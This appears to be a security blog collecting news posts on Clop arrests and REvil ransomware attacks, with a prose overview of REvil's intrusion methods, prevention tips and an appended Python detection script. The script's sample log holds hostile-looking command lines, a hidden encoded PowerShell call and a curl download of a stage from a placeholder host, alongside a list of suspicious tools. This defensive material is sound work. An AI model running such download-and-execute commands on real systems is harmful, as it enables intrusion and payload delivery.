
Thursday, June 17, 2021

Clop Ransomware Gang Got Arrested By Ukraine Police

Ukrainian law enforcement officials have arrested members of the Clop ransomware gang. Officials said they have disrupted the infrastructure used in attacks that have targeted victims around the world since 2019.


The Ukrainian National Police, together with South Korean and U.S. authorities, ran a joint operation and arrested six suspects accused of running a double extortion scheme: if victims refused to pay the ransom, the hackers threatened to leak sensitive financial and personal data.


“Together, law enforcement has managed to shut down the infrastructure from where the virus spreads and block channels for legalizing criminally acquired cryptocurrencies,” the National Police said.




Law enforcement officers seized computer equipment, cars and $184,679 (5 million hryvnia) in 21 searches in the Kiev region. The seizure includes the defendant’s car and house.


The Clop ransomware defendants face up to 8 years’ imprisonment for unauthorized intrusion into home or work computers, AI systems, and computer and telecommunication networks. It has not yet been disclosed whether the defendants are merely affiliates or core developers of the ransomware operation.


Clop Ransomware Previous Attacks:


Clop threat actors have been associated with a number of high-profile attacks since 2019, including Accellion, Qualys, Software AG IT, ExecuPharm and Indiabulls, as well as many universities such as Maastricht University, Stanford University Medical School, the University of Maryland and the University of California.


Last week another ransomware group, Avaddon, shut down its operations and handed the decryption keys of 2,934 victims to BleepingComputer.


You can read the articles below to learn more about ransomware attacks.


Execution and Business Model of REvil Ransomware


REvil Ransomware Attack - JBS Foods Shuts Down Temporarily


Friday, June 4, 2021

REvil Ransomware Attack - JBS Foods Shuts Down Temporarily

The largest meat distributor, JBS Foods, faced a REvil ransomware attack over the weekend; it disrupted several servers supporting its IT systems and affected the supply chain as well.

Global meat distributor JBS SA had to shut down operations in the United States, Canada and Australia after a ransomware attack on its IT systems. “Attackers targeted several servers supporting North American and Australian IT systems of JBS Foods on Sunday,” according to a statement by JBS USA. JBS employees were greeted with a ransom note over the weekend; the same note had been used in previous REvil attacks.

“The company took immediate action, suspending all affected systems, notifying authorities and activating the company’s global network of IT professionals and third-party experts to resolve the situation,” according to the company statement issued after the ransomware attack.

Production began to resume at most of the JBS beef plants in the United States on Wednesday, and the Canadian beef plant was partially operational on Tuesday. Most workers at JBS plants in Australia, Canada and the United States were unable to start work on Monday and Tuesday.

JBS did not confirm whether or not it had paid the ransom to the attackers.

Who is JBS Foods -

Brazil-based JBS Foods is the largest meat distributor, covering beef, chicken and pork. In total, 245,000 employees work for JBS in many countries, and it has 9 plants in the US. Its major clients are Country Pride, Swift, Certified Angus Beef, Clear River Farms and Pilgrim’s.




Who is the Attacker -

The FBI confirmed that a Russia-based cybercriminal group known for its attacks on leading U.S. companies is the main suspect. The group is known as REvil, and it has already targeted around 237 organizations since 2020, according to Recorded Future, a cybersecurity company. The real number of ransomware victims could be much higher, because most organizations quietly pay the ransom to protect their reputation and avoid losing data.

What is REvil Ransomware -

The REvil group runs its organization as "ransomware as a service", renting its script and support to individuals or groups that carry out the attacks. It is also known as Sodinokibi, Bluebackground or Sodin. DarkSide, which was responsible for the Colonial Pipeline ransomware attack, is one of the subscribers of the REvil group; reports suggest that DarkSide has now chosen a separate path. If you want to know about the Execution and Business Model of REvil, you should read this post.

You can also find prevention methods in the post above.

Saturday, May 16, 2020

REvil Ransomware Attack | Hackers Threaten to Post Trump "Dirty Laundry" and Celebs' Secrets

A New York-based firm, Grubman Shire Meiselas & Sacks, which offers legal services to the entertainment and media industries and whose clients include Lady Gaga, Madonna, Elton John, Barbra Streisand, Bruce Springsteen, Mariah Carey, Mary J. Blige and Priyanka Chopra, has been hit by a ransomware attack.

Cybercriminals attacked the law firm using the REvil ransomware (also known as Sodinokibi). The hackers are now threatening to release 756 gigabytes of allegedly stolen data, including telephone numbers, email addresses, non-disclosure agreements, client contracts and personal correspondence. The celebrity law firm is declining to settle, so the attackers have now raised the ransom demand to $42 million and threatened to publish information they claim to hold, including "a ton of dirty laundry" about President Trump.

Since this information is in the public domain, you can get further updates from any news channel or website. Here I'm going to share the complete details of the REvil ransomware.

 

REvil ransomware -

REvil, also known as Sodinokibi, Bluebackground or Sodin, is ransomware backed by an underground affiliate program: affiliates use a wide range of tactics to distribute the ransomware, and the operators earn a 30% to 40% commission. It appeared in the first half of 2019. It exploited vulnerabilities in remote services such as the Oracle WebLogic platform (CVE-2019-2725) and carried out attacks on MSP providers. The Oracle vulnerability was easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack.

Execution Method –

Hackers used the CVE-2019-2725 vulnerability to execute a PowerShell command on the Oracle WebLogic server. This allowed them to upload a dropper to the server, which then installed the payload, the Sodin ransomware. Patches for the bug were released in April; however, a similar vulnerability, CVE-2019-2729, was discovered later.

REvil gets onto users’ machines in different ways via MSPs. In some cases, the attackers used the Webroot and Kaseya remote access consoles to implant the Trojan. In other cases, hackers penetrated MSP infrastructure over an RDP connection, gained privileges, deactivated security solutions and backups, and then downloaded the ransomware to client computers.

Sodinokibi, or REvil, collects some basic system information and saves it to the registry along with the generated encryption parameters. If the dbg option is not set in the config, the UI language and keyboard layout values are checked, and the malware simply exits on systems that match those checks.

Business Model –

Sodinokibi, or REvil, works on a Ransomware-as-a-Service (RaaS) model. Sodinokibi has 41 active affiliates. Each affiliate's version of Sodinokibi is customized with a unique ID so that the affiliate can receive payments. Sodinokibi affiliates keep 60 to 70 percent of every ransom payment.

In July 2019, Sodinokibi advertisers posted a recruitment announcement on a popular hacking forum, UNKN. The advertisement said they were looking for experienced individuals to expand their activity and that it was a private operation with a "limited number of seats" available.

The forum post stressed that it is forbidden to do business in the Commonwealth of Independent States (CIS) region, including Ukraine, Russia, Belarus and Moldova.

Below are some of their attacks that followed the hiring process.

- August 2019: Sodin attacked 22 local administrations in Texas and demanded a collective ransom of $2.5 million.

- August 2019: Hackers attacked a remote data backup service and encrypted files from dental practices in the U.S.

- December 2019: Hackers hit another IT vendor serving hundreds of dentistry practices, infecting clients’ computers by exploiting a vulnerable remote access tool.

- December 2019: They claimed an attack against the CyrusOne data center. According to UNKN's claim, they had stolen files from the company before encrypting its network.

- December 2019: The developers changed their ransom note over the holidays to include a new message wishing the victims a "Merry Christmas and Happy Holidays".

- December 2019: They attacked Travelex, and the company had to take all of its computer systems offline.

- January 2020: Sodinokibi threatened to publish data stolen from GEDIA Automotive Group, a German automotive supplier. They published an MS Excel spreadsheet containing an AdRecon report with information on an Active Directory environment.

- February 2020: The operators of the Sodinokibi (REvil) ransomware started urging affiliates to copy their victims' data before encrypting computers.

- February 2020: The operators of the Sodinokibi ransomware published download links to files containing what they claim are financial and work documents and customers' personal data stolen from U.S. fashion house Kenneth Cole Productions.

 

Prevention –

We recommend the following actions to prevent these kinds of ransomware attack.

- Be a little more vigilant, and don’t open dubious-looking emails.

- Maintain up-to-date backups of the most important files.

- Take the storage of passwords for remote access seriously.

- Use two-factor authentication.

- Log and centrally collect web, application and operating system events.

- Restrict the access of the account used to run the WebLogic process.

- Monitor egress network communications from data center systems.

- Monitor for unexpected activity by service or system accounts (such as the WebLogic user).

- Scan and mitigate your vulnerability posture.

- Restrict outbound data center communications.

- Always be ready for disaster recovery, including maintaining and testing data backups and recovery procedures.
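As an added example (not code from the original post), here is a small Python detection that applies the logging and service-account monitoring advice above to process-creation events: it flags the WebLogic JVM or its service account spawning PowerShell or a shell, which is the pattern described in the Execution Method section. The account names, JSON field names, hosts and sample events are constructed assumptions for the demo.

```python
import json

# Service accounts that run the WebLogic JVM (names are assumptions for this demo).
WEBLOGIC_ACCOUNTS = {"weblogic", "oracle"}
# Interpreters and download utilities a WebLogic JVM has no business spawning.
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "sh", "bash",
                       "certutil.exe", "bitsadmin.exe"}
# Command-line fragments that suggest a download-and-execute dropper stage.
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "curl ", "wget ", " -enc", "frombase64string")


def basename(path):
    """Last path component for either Windows or POSIX separators, lower-cased."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_suspicious(event):
    """Return a reason string when the event matches the detection, else None."""
    user = event.get("user", "").lower()
    parent = basename(event.get("parent_image", ""))
    child = basename(event.get("image", ""))
    cmd = event.get("command_line", "").lower()
    if (user in WEBLOGIC_ACCOUNTS or parent in ("java.exe", "java")) \
            and child in SUSPICIOUS_CHILDREN:
        reason = f"{user}: {parent} spawned {child}"
        if any(hint in cmd for hint in DOWNLOAD_HINTS):
            reason += " (download or encoded command on the command line)"
        return reason
    return None


def scan(log_lines):
    """Run the detection over JSON-lines process events; return (host, reason) alerts."""
    alerts = []
    for line in log_lines:
        if line.strip():
            event = json.loads(line)
            reason = is_suspicious(event)
            if reason:
                alerts.append((event.get("host", "?"), reason))
    return alerts


# Constructed sample events (hypothetical field names; hosts, paths and URL are placeholders).
SAMPLE_LOG = r"""
{"host": "wls-app01", "user": "weblogic", "parent_image": "C:\\jdk\\bin\\java.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell.exe -nop -w hidden -enc aGVsbG8="}
{"host": "wls-app01", "user": "weblogic", "parent_image": "C:\\jdk\\bin\\java.exe", "image": "C:\\Windows\\System32\\conhost.exe", "command_line": "conhost.exe 0x4"}
{"host": "wks-admin7", "user": "jdoe", "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell.exe Get-Service"}
{"host": "wls-app02", "user": "oracle", "parent_image": "/opt/jdk/bin/java", "image": "/bin/sh", "command_line": "sh -c curl http://example.invalid/stage -o /tmp/s"}
"""
```

Running `scan(SAMPLE_LOG.splitlines())` raises two alerts (the Windows and Linux WebLogic hosts) and stays silent on the JVM's console helper and on an administrator's interactive PowerShell.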

 

Conclusion -

Sodinokibi, REvil, Sodin – regardless of what you call it, it is the most dangerous ransomware on the cyberthreat map right now. The REvil attackers use zero-day exploits to distribute the ransomware, and zero-day exploitation can work on otherwise fully patched systems. Its developers always seem to have new, unpredicted tricks up their sleeve, and its perfect crypto implementation means that victims must pay up or lose all their data.